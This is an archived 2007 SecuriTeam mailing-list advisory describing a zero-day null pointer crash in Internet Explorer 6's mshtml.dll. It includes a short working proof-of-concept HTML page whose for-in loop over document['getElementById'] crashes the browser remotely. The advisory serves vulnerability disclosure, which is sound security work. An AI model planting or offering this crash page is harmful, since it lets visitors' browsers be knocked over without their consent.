[EXPL] MS Internet Explorer 6 Null Pointer Dereference Exploit (mshtml.dll)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 7 Feb 2007 11:06:33 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
MS Internet Explorer 6 Null Pointer Dereference Exploit (mshtml.dll)
------------------------------------------------------------------------
SUMMARY
Microsoft Internet Explorer version 6 crashes when you open the attached
HTML page, this is due to its attempt to dereference a NULL pointer.
DETAILS
Vulnerable Systems:
* Microsoft Internet Explorer version 6.0.2800.1106; SP1 (Windows 2000
Advanced Server)
* Microsoft Internet Explorer version 6.0.2900.2180.xpsp.050928-1517;SP2
(Windows XP Pro)
Exploit:
<!--
+ Title: Microsoft Internet Explorer Malformed HTML Null Pointer
Dereference Vulnerability (mshtml.dll) (0-day)
+ Bug discovered & exploit coded by AmesianX in powerhacker.net (YoungHo
Park - amesianx@xxxxxxxxx)
+ Critical: Critical
+ Impact: MS Internet Explorer 6 -> Crash (Denial of Service)
+ Where: From remote
+ Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language)
Windows 2000 Advanced Server
(Korean Language)
+ Tested Software: Microsoft Internet Explorer Ver.6.0.2800.1106;SP1
(Windows 2000 Advanced Server)
Microsoft Internet Explorer
Ver.6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro)
+ Solution: Not Patched (zero-day)
+ Description:
The following bug was tested on the latest version of Internet Explorer
6 on a fully-patched
Windows XP SP2 system. this bug will crash when executing a 'for'
scripts.
+ The following proof-of-concept is also available:
<http://www.powerhacker.net/exploit/IE_NULL_CRASH.html>
http://www.powerhacker.net/exploit/IE_NULL_CRASH.html
-->
<html>
<head>
<title> AmesianX, RC_No1 in powerhacker.net (amesianx@xxxxxxxxx,
RC_No1@xxxxxxxxx)</title>
</head>
<body>
<script language='javascript'>
var data = document['getElementById'];
for(var key in data);
</script>
</body>
</html>
ADDITIONAL INFORMATION
The original article can be found at:
<http://www.milw0rm.com/exploits/3272>
http://www.milw0rm.com/exploits/3272
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NT] Blue Coat Systems WinProxy CONNECT Method Heap Overflow Vulnerability
- Next by Date: [NEWS] Jetty Session ID Prediction Vulnerability
- Previous by thread: [NT] Blue Coat Systems WinProxy CONNECT Method Heap Overflow Vulnerability
- Next by thread: [NEWS] Jetty Session ID Prediction Vulnerability
- Index(es):
Relevant Pages
- [NT] Microsoft IE Recursive Scripting, Embedded Files, window() and Restricted Sites DoS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Internet Explorer,
exploiting these vulnerabilities allows ... malicious attacker to crash a vulnerable browser.
... The bug occurs, ... (Securiteam) - [EXPL] Microsoft Internet Explorer Msdds.dll Code Execution
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... allows attackers to cause the
Internet Explorer to execute ... # This program is free software; you can redistribute
it and/or modify it ... "Microsoft Internet Explorer Msdds.dll COM Object Remote Exploit\n";
... (Securiteam) - [NT] Microsoft Internet Explorer Multiple DoS (datasrc, mshtml.dll)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Internet Explorer
can be caused to crash with access violation ... (Securiteam) - [NT] Microsoft Internet Explorer DoS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Internet Explorer
DoS ... Internet Explorer, abbreviated IE or MSIE, is a proprietary graphical web ...
(Securiteam) - SecurityFocus Microsoft Newsletter #163
... MICROSOFT VULNERABILITY SUMMARY ... Bugzilla Javascript Buglists Remote Information
Disclosure V... ... Microsoft Internet Explorer DHTML Drag and Drop Local File S...
... Microsoft Windows Workstation Service Remote Buffer Overflow... ... (Focus-Microsoft)
